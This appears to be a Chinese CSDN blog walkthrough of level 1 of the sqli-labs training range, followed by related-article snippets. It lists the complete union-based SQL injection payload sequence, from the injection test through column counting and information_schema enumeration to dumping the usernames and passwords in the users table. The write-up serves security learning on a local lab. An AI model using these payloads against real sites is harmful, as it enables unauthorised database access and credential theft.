sqli-labs 第一题

最新推荐文章于 2024-07-25 23:12:39 发布
最新推荐文章于 2024-07-25 23:12:39 发布
阅读量61 收藏
点赞数
分类专栏: SQL注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59049258/article/details/129328693
版权

 1、通过提示可以知道在地址栏上输入id的值

http://localhost/sqli-labs-master/Less-1/?id=1

 2、在地址栏上通过and条件判断存在sql注入点

http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%201=2--%20qsqli-labs-master/Less-1/?id=1' and 1=2 -- q

 

 

 3、判断该网页存在几列

sqli-labs-master/Less-1/?id=1' order by 4 -- q

从这两张图可以看出该网页只存在3列,输入4列报错

 4、将id取一个不存在的值,然后通过联合查询观察回显的列分别是哪些

sqli-labs-master/Less-1/?id=51' union select 1,2,3 -- q

 5、通过修改列获得数据库名

sqli-labs-master/Less-1/?id=51' union select 1,database(),3 -- q

 从图中可以明白数据库名为security;

6、通过数据库名查询数据库中里存在的表

sqli-labs-master/Less-1/?id=51' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- q

 可以发现其中我们需要查询的表名为users;

7、通过表名查询表中字段

sqli-labs-master/Less-1/?id=51' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'-- q

 从图中可以发现存放用户名和密码的字段分别为username和password;

8、查询字段对应的值

sqli-labs-master/Less-1/?id=51' union select 1,group_concat(username),group_concat(password) from users-- q

 从图中可以看出用户名和密码的对应关系

m0_59049258
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqli-labs靶场实战
u011417723的博客
03-08 2458
靶场实战
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs部署及sqli-labs靶场第一关
weixin_63750160的博客
01-29 596
改sql-connections下的 db-creds.inc我这里把端口号改了所以localhost所以后面加:3307。1.下载phpstudy,下载链接:小皮面板(phpstudy) - 让天下没有难配的服务器环境!有可能mysql无法打开,应该是和你本地的mysql冲突了, 在小皮上更改一下端口号。,傻瓜式的安装过后打开软件进入如下界面,我们开启nginx和mysql。查看mysql密码并将其写入靶场配置文件中,正常来讲默认密码是root。下载完成后将压缩文件解压至phpstudy的www目录下。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1250
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs部署及sqli-labs靶场
WE_zzs的博客
02-01 392
注:若在配置环境中无法启动mysql,应是和本地mysql冲突,需改端口号。1.下载phpstudy,并进入软件 打开nginx和mysql。并将其写入靶场配置文件中。(默认密码是root)4.选择sql-connerctions文件。5.在打开db-creds.inc文本。解压至phpstudy的www目录下。2.在启动和下载完成后将。输入127.0.0.1,
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1647
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 558
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第1关详解[Sqli-labs-less-1]
m0_73615178的博客
02-19 526
SQL 注入的三个条件: ①参数可控;(从参数输入就知道参数可控) ②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断) ③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4。
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2094
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
422926799#note#sqli-labs第三十六关1
07-25
sqli-labs Less 36关代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
详细sqli-labs(1-20)通关讲解
05-18
### SQLi-Labs 1-20 关卡详解 #### 第一关:判断是否存在 SQL 注入 本关目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验...
2020-10-23-sqli-labs.md
01-24
- `limit 0,1`:表示输出第一个数据。0表示输出起始位置,1表示输出一个记录。 - `rand(x)`:每个 `x` 对应一个固定的值,但连续执行多次值会变化,不过也可以预测。 - 使用 `floor` 函数的payload示例:`and ...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 441
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
SQL核心基础语法—快速入门MySQL
goldfish8848的博客
07-25 565
MySQL其实是DBMS软件系统,也就是说MySQL并不是一个数据库,这是很多人的误区。我们经常听到的Oracle,MySQL,微软SQL Server,都是DBMS软件系统,我们只是通过这些系统来管理和维护数据库而已,DBMS相当于用户和数据库之间的桥梁。目前有超过300种不同的DBMS系统,我们今天要学习的MySQL是关系型数据库,关系型数据库的数据存储模型很像Excel,用行和列组织数据。操作关系型的DBMS系统,大多数都是用SQL来管理数据,学会了SQL,就相当于学会了这些DBMS的核心。
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 602
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 313
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
sqli-labs第一
09-03
1. 打开sqli-labs网站并导航到第一。 2. 研究页面上的表单或URL参数,找到可以进行注入的输入点。 3. 尝试输入一些常见的注入语句,如' or 1=1 -- 或 ' or '1'='1' -- ,并观察系统的响应。 4. 如果系统返回了预期...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值